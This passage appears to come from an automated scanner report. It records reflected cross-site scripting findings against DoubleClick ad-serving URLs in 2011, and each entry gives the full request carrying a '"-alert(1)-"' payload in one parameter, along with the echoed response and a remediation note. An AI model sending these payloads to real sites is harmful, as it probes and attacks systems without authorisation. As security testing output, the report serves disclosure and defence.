GET /adi/N5552.3159.GOOGLECN.COM/B5038686.14;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=L&ai=Bm0YrwPlXTaPXO4L1lAfCjYCbC_6XpoMCpr725RvW-8TeXwAQARgBIL7O5Q04AFDprPy_B2DJhqOH1KOAELoBCTcyOHg5MF9hc8gBCdoBVWZpbGU6Ly8vQzovY2RuL2V4YW1wbGVzL2h0bWwvdXNlci1hZ2VudC1odHRwLWhlYWRlci14c3MtZXhhbXBsZS1wb2Mtd3d3YW1hem9uY29tLmh0bWyYAtwLuAIYwAIGyALml4sZqAMB9QMAAADEe2c86"-alert(1)-"c09914b1c27&num=1&sig=AGiWqtyxcVoJoAnQsKrfZWMFzSEJ9iPZXA&client=ca-pub-4063878933780912&adurl=;ord=224297922? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1297632807&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fhtml%2Fuser-agent-http-header-xss-example-poc-wwwamazoncom.html&dt=1297611207654&shv=r20101117&jsv=r20110208&saldr=1&correlator=1297611207770&frm=0&adk=1607234649&ga_vid=713314446.1297611208&ga_sid=1297611208&ga_hid=928535827&ga_fc=0&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=994&bih=1010&fu=0&ifi=1&dtd=243&xpc=Jlysl0HKZD&p=file%3A// Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Sun, 13 Feb 2011 15:34:24 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 7413
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... BIL7O5Q04AFDprPy_B2DJhqOH1KOAELoBCTcyOHg5MF9hc8gBCdoBVWZpbGU6Ly8vQzovY2RuL2V4YW1wbGVzL2h0bWwvdXNlci1hZ2VudC1odHRwLWhlYWRlci14c3MtZXhhbXBsZS1wb2Mtd3d3YW1hem9uY29tLmh0bWyYAtwLuAIYwAIGyALml4sZqAMB9QMAAADEe2c86"-alert(1)-"c09914b1c27&num=1&sig=AGiWqtyxcVoJoAnQsKrfZWMFzSEJ9iPZXA&client=ca-pub-4063878933780912&adurl=https%3a%2f%2fwww.hiltonhhonors.com/landingpages/MoreNightsPoints.aspx%3Flang%3DEN%26WT.mc_id%3DzWHWABB0US1HN2DMH3DCDA ...[SNIP]...
The value of the client request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b63f7"-alert(1)-"22f334cffd9 was submitted in the client parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5552.3159.GOOGLECN.COM/B5038686.14;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=L&ai=Bm0YrwPlXTaPXO4L1lAfCjYCbC_6XpoMCpr725RvW-8TeXwAQARgBIL7O5Q04AFDprPy_B2DJhqOH1KOAELoBCTcyOHg5MF9hc8gBCdoBVWZpbGU6Ly8vQzovY2RuL2V4YW1wbGVzL2h0bWwvdXNlci1hZ2VudC1odHRwLWhlYWRlci14c3MtZXhhbXBsZS1wb2Mtd3d3YW1hem9uY29tLmh0bWyYAtwLuAIYwAIGyALml4sZqAMB9QMAAADE&num=1&sig=AGiWqtyxcVoJoAnQsKrfZWMFzSEJ9iPZXA&client=ca-pub-4063878933780912b63f7"-alert(1)-"22f334cffd9&adurl=;ord=224297922? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1297632807&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fhtml%2Fuser-agent-http-header-xss-example-poc-wwwamazoncom.html&dt=1297611207654&shv=r20101117&jsv=r20110208&saldr=1&correlator=1297611207770&frm=0&adk=1607234649&ga_vid=713314446.1297611208&ga_sid=1297611208&ga_hid=928535827&ga_fc=0&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=994&bih=1010&fu=0&ifi=1&dtd=243&xpc=Jlysl0HKZD&p=file%3A// Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Sun, 13 Feb 2011 15:36:24 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 7413
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... 4YW1wbGVzL2h0bWwvdXNlci1hZ2VudC1odHRwLWhlYWRlci14c3MtZXhhbXBsZS1wb2Mtd3d3YW1hem9uY29tLmh0bWyYAtwLuAIYwAIGyALml4sZqAMB9QMAAADE&num=1&sig=AGiWqtyxcVoJoAnQsKrfZWMFzSEJ9iPZXA&client=ca-pub-4063878933780912b63f7"-alert(1)-"22f334cffd9&adurl=https%3a%2f%2fwww.hiltonhhonors.com/landingpages/MoreNightsPoints.aspx%3Flang%3DEN%26WT.mc_id%3DzWHWABB0US1HN2DMH3DCDA4MNMP7HE840268%26cssiteid%3D1004575%26csdartid%3D5808780039988527"); var fs ...[SNIP]...
The value of the num request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2b559"-alert(1)-"8ad9d64ed89 was submitted in the num parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5552.3159.GOOGLECN.COM/B5038686.14;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=L&ai=Bm0YrwPlXTaPXO4L1lAfCjYCbC_6XpoMCpr725RvW-8TeXwAQARgBIL7O5Q04AFDprPy_B2DJhqOH1KOAELoBCTcyOHg5MF9hc8gBCdoBVWZpbGU6Ly8vQzovY2RuL2V4YW1wbGVzL2h0bWwvdXNlci1hZ2VudC1odHRwLWhlYWRlci14c3MtZXhhbXBsZS1wb2Mtd3d3YW1hem9uY29tLmh0bWyYAtwLuAIYwAIGyALml4sZqAMB9QMAAADE&num=12b559"-alert(1)-"8ad9d64ed89&sig=AGiWqtyxcVoJoAnQsKrfZWMFzSEJ9iPZXA&client=ca-pub-4063878933780912&adurl=;ord=224297922? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1297632807&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fhtml%2Fuser-agent-http-header-xss-example-poc-wwwamazoncom.html&dt=1297611207654&shv=r20101117&jsv=r20110208&saldr=1&correlator=1297611207770&frm=0&adk=1607234649&ga_vid=713314446.1297611208&ga_sid=1297611208&ga_hid=928535827&ga_fc=0&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=994&bih=1010&fu=0&ifi=1&dtd=243&xpc=Jlysl0HKZD&p=file%3A// Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Sun, 13 Feb 2011 15:35:00 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 7413
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... Q04AFDprPy_B2DJhqOH1KOAELoBCTcyOHg5MF9hc8gBCdoBVWZpbGU6Ly8vQzovY2RuL2V4YW1wbGVzL2h0bWwvdXNlci1hZ2VudC1odHRwLWhlYWRlci14c3MtZXhhbXBsZS1wb2Mtd3d3YW1hem9uY29tLmh0bWyYAtwLuAIYwAIGyALml4sZqAMB9QMAAADE&num=12b559"-alert(1)-"8ad9d64ed89&sig=AGiWqtyxcVoJoAnQsKrfZWMFzSEJ9iPZXA&client=ca-pub-4063878933780912&adurl=https%3a%2f%2fwww.hiltonhhonors.com/landingpages/MoreNightsPoints.aspx%3Flang%3DEN%26WT.mc_id%3DzWHWABB0US1HN2DMH3DCDA4MNMP7 ...[SNIP]...
The value of the sig request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 93325"-alert(1)-"9802dba7be4 was submitted in the sig parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5552.3159.GOOGLECN.COM/B5038686.14;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=L&ai=Bm0YrwPlXTaPXO4L1lAfCjYCbC_6XpoMCpr725RvW-8TeXwAQARgBIL7O5Q04AFDprPy_B2DJhqOH1KOAELoBCTcyOHg5MF9hc8gBCdoBVWZpbGU6Ly8vQzovY2RuL2V4YW1wbGVzL2h0bWwvdXNlci1hZ2VudC1odHRwLWhlYWRlci14c3MtZXhhbXBsZS1wb2Mtd3d3YW1hem9uY29tLmh0bWyYAtwLuAIYwAIGyALml4sZqAMB9QMAAADE&num=1&sig=AGiWqtyxcVoJoAnQsKrfZWMFzSEJ9iPZXA93325"-alert(1)-"9802dba7be4&client=ca-pub-4063878933780912&adurl=;ord=224297922? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1297632807&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fhtml%2Fuser-agent-http-header-xss-example-poc-wwwamazoncom.html&dt=1297611207654&shv=r20101117&jsv=r20110208&saldr=1&correlator=1297611207770&frm=0&adk=1607234649&ga_vid=713314446.1297611208&ga_sid=1297611208&ga_hid=928535827&ga_fc=0&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=994&bih=1010&fu=0&ifi=1&dtd=243&xpc=Jlysl0HKZD&p=file%3A// Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Sun, 13 Feb 2011 15:35:45 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 7413
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... c8gBCdoBVWZpbGU6Ly8vQzovY2RuL2V4YW1wbGVzL2h0bWwvdXNlci1hZ2VudC1odHRwLWhlYWRlci14c3MtZXhhbXBsZS1wb2Mtd3d3YW1hem9uY29tLmh0bWyYAtwLuAIYwAIGyALml4sZqAMB9QMAAADE&num=1&sig=AGiWqtyxcVoJoAnQsKrfZWMFzSEJ9iPZXA93325"-alert(1)-"9802dba7be4&client=ca-pub-4063878933780912&adurl=https%3a%2f%2fwww.hiltonhhonors.com/landingpages/MoreNightsPoints.aspx%3Flang%3DEN%26WT.mc_id%3DzWHWABB0US1HN2DMH3DCDA4MNMP7HE840268%26cssiteid%3D1004575%26csdarti ...[SNIP]...
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d517c"-alert(1)-"55dc8e75f24 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5552.3159.GOOGLECN.COM/B5038686.14;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=Ld517c"-alert(1)-"55dc8e75f24&ai=Bm0YrwPlXTaPXO4L1lAfCjYCbC_6XpoMCpr725RvW-8TeXwAQARgBIL7O5Q04AFDprPy_B2DJhqOH1KOAELoBCTcyOHg5MF9hc8gBCdoBVWZpbGU6Ly8vQzovY2RuL2V4YW1wbGVzL2h0bWwvdXNlci1hZ2VudC1odHRwLWhlYWRlci14c3MtZXhhbXBsZS1wb2Mtd3d3YW1hem9uY29tLmh0bWyYAtwLuAIYwAIGyALml4sZqAMB9QMAAADE&num=1&sig=AGiWqtyxcVoJoAnQsKrfZWMFzSEJ9iPZXA&client=ca-pub-4063878933780912&adurl=;ord=224297922? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1297632807&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fhtml%2Fuser-agent-http-header-xss-example-poc-wwwamazoncom.html&dt=1297611207654&shv=r20101117&jsv=r20110208&saldr=1&correlator=1297611207770&frm=0&adk=1607234649&ga_vid=713314446.1297611208&ga_sid=1297611208&ga_hid=928535827&ga_fc=0&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=994&bih=1010&fu=0&ifi=1&dtd=243&xpc=Jlysl0HKZD&p=file%3A// Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Sun, 13 Feb 2011 15:33:54 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 7413
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... l = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3aad/f/19c/%2a/r%3B234353572%3B0-0%3B0%3B58087800%3B3454-728/90%3B39988527/40006314/1%3B%3B%7Esscs%3D%3fhttp://googleads.g.doubleclick.net/aclk?sa=Ld517c"-alert(1)-"55dc8e75f24&ai=Bm0YrwPlXTaPXO4L1lAfCjYCbC_6XpoMCpr725RvW-8TeXwAQARgBIL7O5Q04AFDprPy_B2DJhqOH1KOAELoBCTcyOHg5MF9hc8gBCdoBVWZpbGU6Ly8vQzovY2RuL2V4YW1wbGVzL2h0bWwvdXNlci1hZ2VudC1odHRwLWhlYWRlci14c3MtZXhhbXBsZS1wb2Mt ...[SNIP]...
The value of the adurl request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 59de7"-alert(1)-"43d015177ff was submitted in the adurl parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N763.N763.GoogleContentNet/B4639841.15;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BR3Xjuw1YTducGNL6lQeKq8WaC6KPs4cCysjo7RTAjbcB0OlfEAEYASC-zuUNOABQioiJ8QVgyYajh9SjgBCgAfLcs-sDugEJNzI4eDkwX2FzyAEJ2gFYZmlsZTovLy9DOi9jZG4vZXhhbXBsZXMvZXhwbG9pdHMvdXJpLWNsaWNrLXRvLWV4ZWN1dGUteHNzLWNyb3NzLXNpdGUtc2NyaXB0aW5nLmh0bWwuaHRtbLgCGMgCmprFFqgDAdEDgo3m5suica7oA7oC6APiBfUDAAAAxA&num=1&sig=AGiWqtzXFtYkVq0bmudz_sj6EVeUl3e5UQ&client=ca-pub-4063878933780912&adurl=59de7"-alert(1)-"43d015177ff HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1297637934&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fexploits%2Furi-click-to-execute-xss-cross-site-scripting.html.html&dt=1297616334663&shv=r20101117&jsv=r20110208&saldr=1&correlator=1297616334682&frm=0&adk=1607234649&ga_vid=1527264931.1297616335&ga_sid=1297616335&ga_hid=1186706569&ga_fc=0&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1096&bih=1010&fu=0&ifi=1&dtd=57&xpc=v34befYgjb&p=file%3A// Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 7021 Cache-Control: no-cache Pragma: no-cache Date: Sun, 13 Feb 2011 17:02:03 GMT Expires: Sun, 13 Feb 2011 17:02:03 GMT
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... LWNsaWNrLXRvLWV4ZWN1dGUteHNzLWNyb3NzLXNpdGUtc2NyaXB0aW5nLmh0bWwuaHRtbLgCGMgCmprFFqgDAdEDgo3m5suica7oA7oC6APiBfUDAAAAxA&num=1&sig=AGiWqtzXFtYkVq0bmudz_sj6EVeUl3e5UQ&client=ca-pub-4063878933780912&adurl=59de7"-alert(1)-"43d015177ffhttp://www.devry.edu/degree-programs/colleges-overview.jsp?vc=167474"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; var dcallowscriptaccess = "never";
The value of the ai request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f4152"-alert(1)-"49a024bfa21 was submitted in the ai parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N763.N763.GoogleContentNet/B4639841.15;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BR3Xjuw1YTducGNL6lQeKq8WaC6KPs4cCysjo7RTAjbcB0OlfEAEYASC-zuUNOABQioiJ8QVgyYajh9SjgBCgAfLcs-sDugEJNzI4eDkwX2FzyAEJ2gFYZmlsZTovLy9DOi9jZG4vZXhhbXBsZXMvZXhwbG9pdHMvdXJpLWNsaWNrLXRvLWV4ZWN1dGUteHNzLWNyb3NzLXNpdGUtc2NyaXB0aW5nLmh0bWwuaHRtbLgCGMgCmprFFqgDAdEDgo3m5suica7oA7oC6APiBfUDAAAAxAf4152"-alert(1)-"49a024bfa21&num=1&sig=AGiWqtzXFtYkVq0bmudz_sj6EVeUl3e5UQ&client=ca-pub-4063878933780912&adurl=;ord=405226418? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1297637934&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fexploits%2Furi-click-to-execute-xss-cross-site-scripting.html.html&dt=1297616334663&shv=r20101117&jsv=r20110208&saldr=1&correlator=1297616334682&frm=0&adk=1607234649&ga_vid=1527264931.1297616335&ga_sid=1297616335&ga_hid=1186706569&ga_fc=0&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1096&bih=1010&fu=0&ifi=1&dtd=57&xpc=v34befYgjb&p=file%3A// Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Sun, 13 Feb 2011 16:59:35 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 7051
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... BCgAfLcs-sDugEJNzI4eDkwX2FzyAEJ2gFYZmlsZTovLy9DOi9jZG4vZXhhbXBsZXMvZXhwbG9pdHMvdXJpLWNsaWNrLXRvLWV4ZWN1dGUteHNzLWNyb3NzLXNpdGUtc2NyaXB0aW5nLmh0bWwuaHRtbLgCGMgCmprFFqgDAdEDgo3m5suica7oA7oC6APiBfUDAAAAxAf4152"-alert(1)-"49a024bfa21&num=1&sig=AGiWqtzXFtYkVq0bmudz_sj6EVeUl3e5UQ&client=ca-pub-4063878933780912&adurl=http%3a%2f%2fwww.devry.edu/degree-programs/colleges-overview.jsp%3Fvc%3D167474"); var fscUrl = url; var fscUrlClickTag ...[SNIP]...
The value of the client request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dd6b8"-alert(1)-"95da157adb8 was submitted in the client parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N763.N763.GoogleContentNet/B4639841.15;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BR3Xjuw1YTducGNL6lQeKq8WaC6KPs4cCysjo7RTAjbcB0OlfEAEYASC-zuUNOABQioiJ8QVgyYajh9SjgBCgAfLcs-sDugEJNzI4eDkwX2FzyAEJ2gFYZmlsZTovLy9DOi9jZG4vZXhhbXBsZXMvZXhwbG9pdHMvdXJpLWNsaWNrLXRvLWV4ZWN1dGUteHNzLWNyb3NzLXNpdGUtc2NyaXB0aW5nLmh0bWwuaHRtbLgCGMgCmprFFqgDAdEDgo3m5suica7oA7oC6APiBfUDAAAAxA&num=1&sig=AGiWqtzXFtYkVq0bmudz_sj6EVeUl3e5UQ&client=ca-pub-4063878933780912dd6b8"-alert(1)-"95da157adb8&adurl=;ord=405226418? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1297637934&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fexploits%2Furi-click-to-execute-xss-cross-site-scripting.html.html&dt=1297616334663&shv=r20101117&jsv=r20110208&saldr=1&correlator=1297616334682&frm=0&adk=1607234649&ga_vid=1527264931.1297616335&ga_sid=1297616335&ga_hid=1186706569&ga_fc=0&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1096&bih=1010&fu=0&ifi=1&dtd=57&xpc=v34befYgjb&p=file%3A// Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Sun, 13 Feb 2011 17:01:32 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 7051
